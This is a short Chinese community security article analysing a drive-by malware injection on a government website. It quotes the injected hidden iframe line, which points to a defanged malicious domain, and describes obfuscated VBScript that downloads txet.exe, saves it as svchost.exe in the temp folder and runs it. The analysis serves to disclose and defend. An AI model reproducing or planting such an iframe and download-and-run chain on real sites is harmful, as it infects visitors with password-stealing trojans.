备案控制台

开发者社区安全文章正文

某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

2024-09-28 20

版权

版权声明：

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

网站首页被加入代码：

/------
＜iframe height=0 width=0 src="hxxp://www.g**ao**jun***888.com/4"＞＜/iframe＞
------/

打开网页4 中包含Javascript代码，输出一段加入多余空格、使用escape()加密的VBScript脚本程序。

该VBScript脚本程序利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件txet.exe，保存为 %temp%/svchost.exe，然后调用自定义函数yunxingexe(m5,X skj9)。

自定义函数yunxingexe()创建Shell.Application 对象XsKje，利用 XsKje 的 ShellExecute 方法来运行 %temp%/svchost.exe。

/------

文章标签：

安全

JavaScript

前端开发

数据安全/隐私保护

游客qeoynko2nmbgk

目录

相关文章

游客qeoynko2nmbgk

|

2月前

|

安全

某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg

游客qeoynko2nmbgk

31 1 1

游客qeoynko2nmbgk

|

2月前

|

数据安全/隐私保护

一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站

游客qeoynko2nmbgk

16 1 1

游客qeoynko2nmbgk

|

2月前

|

安全数据安全/隐私保护

01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)

01-12/某县政府网被加入下载木马 Trojan.Win32.Pakes 的代码(第2版)

游客qeoynko2nmbgk

25 1 1

游客qeoynko2nmbgk

|

2月前

某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262

某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262

游客qeoynko2nmbgk

11 0 0

游客qeoynko2nmbgk

|

2月前

|

安全

遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1

遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等1

游客qeoynko2nmbgk

40 0 0

游客qeoynko2nmbgk

|

2月前

|

安全 Windows

木马windowout.exe

木马windowout.exe

游客qeoynko2nmbgk

25 0 0

游客qeoynko2nmbgk

|

2月前

|

安全

遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马

遭遇Trojan-PSW.Win32.WOW.ms、Trojan-PSW.Win32.Lmir.bgb等木马

游客qeoynko2nmbgk

29 0 0

游客qeoynko2nmbgk

|

2月前

|

安全数据安全/隐私保护

某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码

某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码

游客qeoynko2nmbgk

21 0 0

游客qeoynko2nmbgk

|

2月前

|

安全 Windows

抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马

抓获Backdoor.Gpigeon.voo和Trojan.PSW.OnlineGames.xd等盗号木马

游客qeoynko2nmbgk

26 0 0

游客qeoynko2nmbgk

|

2月前

|

JavaScript 前端开发

某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等

某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等

游客qeoynko2nmbgk

31 0 0

热门文章

最新文章

会声会影2023视频编辑软件免费序列号永久

苹果电脑 Mac OS X 系统上防止误按 command+Q 退出软件

Flutter之禅内存优化篇

用户密码以BCrypt加密的方式来防范被破解

java Redis工具类

XP注册表优化工具箱

CV和Resume的区别（转）

两名在校生的问题

【AIX 学习】网络管理

通义灵码的代码安全增强措施

国外地区经纬度查询免费API接口教程

《C++文件操作新境界：随机访问与映射的高效实现秘籍》

《C++ 网络编程：高效实现 TCP/IP 与 UDP 通信》

全国行政区划查询免费API接口教程

全国行政区划代码与经纬度查询免费API接口教程

Web应用防火墙（WAF）与数据库应用防火墙有什么区别？

服务器最大支持多少链接数

国家名称大全免费API接口教程

相关电子书

更多

低代码开发师（初级）实战教程

冬季实战营第三期：MySQL数据库进阶实战

阿里巴巴DevOps 最佳实践手册

下一篇

阿里云OSS设置跨域访问